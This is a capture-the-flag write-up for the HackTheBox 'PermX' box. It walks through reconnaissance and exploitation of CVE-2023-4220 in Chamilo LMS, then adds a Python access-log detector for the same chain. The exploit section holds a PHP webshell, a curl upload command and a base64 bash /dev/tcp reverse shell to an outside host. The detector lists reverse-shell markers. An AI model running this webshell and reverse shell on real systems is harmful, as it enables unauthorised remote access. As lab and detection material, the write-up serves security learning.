[HackTheBox] PermX – Easy – WP

Machine info

  • OS: Linux
  • Difficulty: Easy

Writeup

Information gathering

An nmap scan finds two open TCP ports: SSH (22) and HTTP (80).

root@kali$ nmap -p- --min-rate 10000 10.10.11.23
Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-06 21:38 EDT
Nmap scan report for 10.10.11.23
Host is up (0.087s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
oxdf@hacky$ nmap -p 22,80 -sCV 10.10.11.23
Starting Nmap 7.80 ( https://nmap.org ) at 2024-07-06 21:38 EDT
Nmap scan report for 10.10.11.23
Host is up (0.087s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://permx.htb
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.82 seconds

A vulnerability scan with nmap --script vuln did not turn up anything useful.

Based on the OpenSSH and Apache versions, the host is probably Ubuntu 22.04 (jammy).

Visiting port 80 returns a 302 redirect to permx.htb.

Subdomain fuzzing

Here I use ffuf to fuzz for subdomains (virtual hosts) via the Host header.

root@kali$ ffuf -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.23
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
 :: Header           : Host: FUZZ.permx.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 88ms]
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 122ms]
:: Progress: [19966/19966] :: Job [1/1] :: 458 req/sec :: Duration: [0:00:45] :: Errors: 0 ::

Add the discovered names to the local hosts file.

vim /etc/hosts
10.10.11.23 permx.htb www.permx.htb lms.permx.htb

Web – Port 80

WWW

www.permx.htb and permx.htb return identical responses.

root@kali$ curl -s permx.htb | wc 
    586    2466   36182
root@kali$ curl -s www.permx.htb | wc 
    586    2466   36182
root@kali$ curl -s permx.htb | md5sum
71646e5bbcf317ff2aea64b6be02b1dc  -
root@kali$ curl -s www.permx.htb | md5sum
71646e5bbcf317ff2aea64b6be02b1dc  -

For now I assume they resolve to the same directory.

Site

The site looks like an e-learning platform.

Most pages are static; there is nothing of interest here.

Tech stack

Almost entirely static.

The 404 page is the default Apache 404.

Directory brute-forcing

Here I use feroxbuster, which needs almost no extra configuration; since the site is purely static I add the -x html option.

root@kali$ feroxbuster -u http://permx.htb -x html --dont-extract-links
                                                                                                                      
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://permx.htb
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💲  Extensions            │ [html]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      303c http://permx.htb/js => http://permx.htb/js/
301      GET        9l       28w      304c http://permx.htb/css => http://permx.htb/css/
301      GET        9l       28w      304c http://permx.htb/img => http://permx.htb/img/
200      GET      587l     2466w    36182c http://permx.htb/
301      GET        9l       28w      304c http://permx.htb/lib => http://permx.htb/lib/
200      GET      275l      899w    14753c http://permx.htb/contact.html
200      GET      367l     1362w    20542c http://permx.htb/about.html
200      GET      208l      701w    10428c http://permx.htb/404.html
[####################] - 2m    150000/150000  0s      found:12      errors:0      
[####################] - 2m     30000/30000   294/s   http://permx.htb/ 
[####################] - 0s     30000/30000   348837/s http://permx.htb/js/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   344828/s http://permx.htb/css/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   340909/s http://permx.htb/img/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)
[####################] - 0s     30000/30000   348837/s http://permx.htb/lib/ => Directory listing (add --scan-dir-listings to scan) (remove --dont-extract-links to scan)

Unfortunately there is nothing of interest.

lms.permx.htb

The other subdomain

This site presents a login page built with Chamilo.

From GitHub I learn that the update of this application to 2.0 was a major one.

There is an information leak here: http://lms.permx.htb/README.md can be downloaded.

root@kali$ wget lms.permx.htb/README.md
--2024-07-06 22:31:33--  http://lms.permx.htb/README.md
Resolving lms.permx.htb (lms.permx.htb)... 10.10.11.23
Connecting to lms.permx.htb (lms.permx.htb)|10.10.11.23|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8074 (7.9K) [text/markdown]
Saving to: ‘README.md’

README.md                           100%[=================================================================>]   7.88K  --.-KB/s    in 0s      

2024-07-06 22:31:33 (789 MB/s) - ‘README.md’ saved [8074/8074]
oxdf@hacky$ cat README.md
# Chamilo 1.11.x

![PHP Composer](https://github.com/chamilo/chamilo-lms/workflows/PHP%20Composer/badge.svg?branch=1.11.x)
[![Scrutinizer Code Quality](https://scrutinizer-ci.com/g/chamilo/chamilo-lms/badges/quality-score.png?b=1.11.x)](https://scrutinizer-ci.com/g/chamilo/chamilo-lms/?branch=1.11.x)
[![Bountysource](https://www.bountysource.com/badge/team?team_id=12439&style=raised)](https://www.bountysource.com/teams/chamilo?utm_source=chamilo&utm_medium=shield&utm_campaign=raised)
[![Code Consistency](https://squizlabs.github.io/PHP_CodeSniffer/analysis/chamilo/chamilo-lms/grade.svg)](http://squizlabs.github.io/PHP_CodeSniffer/analysis/chamilo/chamilo-lms/)
[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/166/badge)](https://bestpractices.coreinfrastructure.org/projects/166)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/88e934aab2f34bb7a0397a6f62b078b2)](https://www.codacy.com/app/chamilo/chamilo-lms?utm_source=github.com&utm_medium=referral&utm_content=chamilo/chamilo-lms&utm_campaign=badger)

## Installation

This installation guide is for development environments only.

### Install PHP, a web server and MySQL/MariaDB

To run Chamilo, you will need at least a web server (we recommend Apache2 for commodity reasons), a database server (we recommend MariaDB but will explain MySQL for commodity reasons) and a PHP interpreter (and a series of libraries for it). If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just
type
```
sudo apt-get install apache2 mysql-server php libapache2-mod-php php-gd php-intl php-curl php-json php-mysql php-zip composer
```

### Install Git

The development version 1.11.x requires you to have Git installed. If you are working on a Debian-based system (Debian, Ubuntu, Mint, etc), just type
```
sudo apt-get install git
```

### Install Composer

To run the development version 1.11.x, you need Composer, a libraries dependency management system that will update all the libraries you need for Chamilo to the latest available version.

Make sure you have Composer installed. If you do, you should be able to launch "composer" on the command line and have the inline help of composer show a few subcommands. If you don't, please follow the installation guide at https://getcomposer.org/download/

### Download Chamilo from GitHub

Clone the repository

```
sudo mkdir chamilo-1.11
sudo chown -R `whoami` chamilo-1.11
git clone -b 1.11.x --single-branch https://github.com/chamilo/chamilo-lms.git chamilo-1.11
```

Checkout branch 1.11.x

```
cd chamilo-1.11
git checkout --track origin/1.11.x
git config --global push.default current
```

### Update dependencies using Composer

From the Chamilo folder (in which you should be now if you followed the previous steps), launch:

```
composer update
```

If you face issues related to missing JS libraries, you might need to ensure
that your web/assets folder is completely re-generated.
Use this set of commands to do that:
```
rm composer.lock
rm -rf web/ vendor/
composer clear-cache
composer update
```
This will take several minutes in the best case scenario, but should definitely
generate the missing files.

### Change permissions

On a Debian-based system, launch:
```
sudo chown -R www-data:www-data app main/default_course_document/images main/lang web
```

### Configure the web server

Enable the Apache web server module "rewrite" :
```
sudo a2enmod rewrite
sudo systemctl restart apache2.service
```

Chamilo's .htaccess must be obeyed.
Create /etc/apache2/conf-available/htaccessForChamilo.conf with these lines :
```
<Directory /var/www/html/chamilo-lms>
        AllowOverride All
</Directory>
```

then enable it :
```
sudo a2enconf htaccessForChamilo
sudo systemctl reload apache2.service
```

If you just installed missing PHP extensions using apt, you must restart the web server to get them loaded :
```
sudo systemctl restart apache2.service
```

### Start the installer

In your browser, load the Chamilo URL. You should be automatically redirected
to the installer. If not, add the "main/install/index.php" suffix manually in
your browser address bar. The rest should be a matter of simple
 OK > Next > OK > Next...

## Upgrade from 1.10.x

1.11.0 is a major version. It contains a series of new features, that
also mean a series of new database changes in regards with versions 1.10.x. As
such, it is necessary to go through an upgrade procedure when upgrading from
1.10.x to 1.11.x.

The upgrade procedure is relatively straightforward. If you have a 1.10.x
initially installed with Git, here are the steps you should follow
(considering you are already inside the Chamilo folder):
```
git fetch --all
git checkout origin 1.11.x
```

Then load the Chamilo URL in your browser, adding "main/install/index.php" and
follow the upgrade instructions. Select the "Upgrade from 1.10.x" button to
proceed.

If you have previously updated database rows manually, you might face issue with
FOREIGN KEYS during the upgrade process. Please make sure your database is
consistent before upgrading. This usually means making sure that you have to delete
rows from tables referring to rows which have been deleted from the user or access_url tables.
Typically:
<pre>
    DELETE FROM access_url_rel_course WHERE access_url_id NOT IN (SELECT id FROM access_url);
</pre>

### Upgrading from non-Git Chamilo 1.10 ###

In the *very unlikely* case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the ```composer update``` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonable internet connection).

```
rm composer.lock
rm -rf web/*
rm -rf vendor/*
```


# For developers and testers only

This section is for developers only (or for people who have a good reason to use
a development version of Chamilo), in the sense that other people will not
need to update their Chamilo portal as described here.

## Updating code

To update your code with the latest developments in the 1.11.x branch, go to
your Chamilo folder and type:
```
git pull origin 1.11.x
```
If you have made customizations to your code before the update, you will have
two options:
- abandon your changes (use "git stash" to do that)
- commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to
use Chamilo as a developer, so if you feel lost, please check the Git manual
first: http://git-scm.com/documentation

## Updating your database from new code

Since the 2015-05-27, Chamilo offers the possibility to make partial database
upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder
and type
```
php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
```

If you want to proceed with a single migration "step" (the steps reside in
src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the
version and type the following (assuming you want to execute Version20150527120703)
```
php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
```

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:
```
php bin/doctrine.php orm:schema-tool:update --dump-sql
```

## Contributing

If you want to submit new features or patches to Chamilo, please follow the
Github contribution guide https://guides.github.com/activities/contributing-to-open-source/
and our CONTRIBUTING.md file.
In short, we ask you to send us Pull Requests based on a branch that you create
with this purpose into your repository forked from the original Chamilo repository.

# Documentation
For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

Version 1.11.x is mentioned repeatedly.

I go back to GitHub and select this version.

There is a documentation directory under the root.

The installed version appears to be 1.11.24.

Foothold

Initial access – obtaining a www-data shell

Identifying the CVE

Searching for "chamilo vuln" returns several CVE numbers.

One of them requires no authentication.

Exploitation

CVE-2023-4220

Background

CVE-2023-4220 allows remote code execution (RCE) by writing a webshell through what is described as a "stored XSS".
StarLabs' advisory describes the vulnerability in detail. Although the report calls it XSS, I think it is closer to an unauthenticated file upload.

PoC
First check whether the path exists.

It is empty; now I write a PHP webshell.

A webshell achieves code or command execution by serving a page that calls a code- or command-execution function.

<?php system($_REQUEST['cmd']); ?>

Now I build the request with curl to write this file.

root@kali$ curl -F '[email protected]' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.

Now I create a Base64-encoded Bash reverse shell.

root@kali$ echo 'bash  -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1"' | base64 -w0
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSIK

Execute it

root@kali$ curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php?cmd=echo+YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSIK|base64+-d|bash'

With an nc listener set up, we receive a reverse shell.

root@kali$ nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.23 44392
bash: cannot set terminal process group (1168): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$
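The chain above leaves a recognisable trail in the Apache access log: a POST to bigUpload.php with action=post-unsupported, then a GET to a .php file under bigupload/files/, then a cmd= parameter carrying a base64 blob that decodes to a /dev/tcp reverse shell. The following Python script is an added example for the defender side; it is not code from this write-up, from Chamilo or from the StarLabs advisory. The combined-log regex, the constants UPLOAD_PATH, FILES_DIR and SHELL_MARKERS, the function names and the sample log lines are all assumptions constructed for the example (the sample reuses the paths and payload shown above; it is not a capture from the box).

```python
"""Detect the bigUpload.php abuse chain in Apache access logs.

Added example, not part of the original write-up or of Chamilo. The log
format, path constants and marker list are assumptions for the example;
the sample log lines below are constructed, not captured from the box.
"""
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" log format (only the leading fields are needed).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths taken from the write-up: the upload endpoint and the directory
# where uploaded files land.
UPLOAD_PATH = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
FILES_DIR = "/main/inc/lib/javascript/bigupload/files/"

# Substrings that indicate a reverse shell or a decode-and-run chain (assumed list).
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e", "base64 -d", "|bash", "| bash")

# Base64-looking tokens long enough to be worth decoding.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_fragments(text):
    """Decode every base64-looking token in text; tokens that are not valid base64 are skipped."""
    out = []
    for token in B64_RE.findall(text):
        try:
            out.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def analyse_request(method, uri):
    """Return a list of finding strings for one request (empty if nothing matched)."""
    findings = []
    parts = urlsplit(uri)
    path, query = parts.path, parse_qs(parts.query)

    # Stage 1: the unauthenticated upload request (CVE-2023-4220 in the write-up).
    if method == "POST" and path == UPLOAD_PATH and "post-unsupported" in query.get("action", []):
        findings.append("unauthenticated-upload:post-unsupported")

    # Stage 2: a PHP file requested from the upload directory.
    if path.startswith(FILES_DIR) and path.endswith(".php"):
        findings.append("php-in-upload-dir:" + path.rsplit("/", 1)[-1])
        # Stage 3: a cmd= parameter, inspected raw and after base64 decoding.
        if "cmd" in query:
            cmd = query["cmd"][0]  # parse_qs already turned '+' into spaces
            hits = set()
            for text in [cmd] + decode_b64_fragments(cmd):
                hits.update(m for m in SHELL_MARKERS if m in text)
            if hits:
                findings.append("shell-markers:" + ",".join(sorted(hits)))
    return findings


def scan_log(log_text):
    """Return (ip, method, path, findings) for every log line that triggers a finding."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        findings = analyse_request(m["method"], m["uri"])
        if findings:
            alerts.append((m["ip"], m["method"], urlsplit(m["uri"]).path, findings))
    return alerts


# Constructed sample log: directory check, upload, webshell call, benign download.
SAMPLE_LOG = """\
10.10.14.6 - - [06/Jul/2024:22:40:01 -0400] "GET /main/inc/lib/javascript/bigupload/files/ HTTP/1.1" 200 512
10.10.14.6 - - [06/Jul/2024:22:41:12 -0400] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 38
10.10.14.6 - - [06/Jul/2024:22:42:30 -0400] "GET /main/inc/lib/javascript/bigupload/files/shell.php?cmd=echo+YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNi80NDMgMD4mMSIK|base64+-d|bash HTTP/1.1" 200 0
10.10.14.7 - - [06/Jul/2024:22:43:00 -0400] "GET /main/inc/lib/javascript/bigupload/files/report.pdf HTTP/1.1" 200 20480
"""

if __name__ == "__main__":
    for ip, method, path, findings in scan_log(SAMPLE_LOG):
        print(f"{ip} {method} {path} -> {'; '.join(findings)}")
```

Point scan_log at a real access log to get one tuple per suspicious request. The upload finding is the one to alert on first: that request needs no session and precedes the shell, so it is the earliest point at which the chain can be interrupted.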

Privilege escalation

I will continue with the privilege escalation part in the next post.

If you have read this far, you are already ahead of 80% of people.

 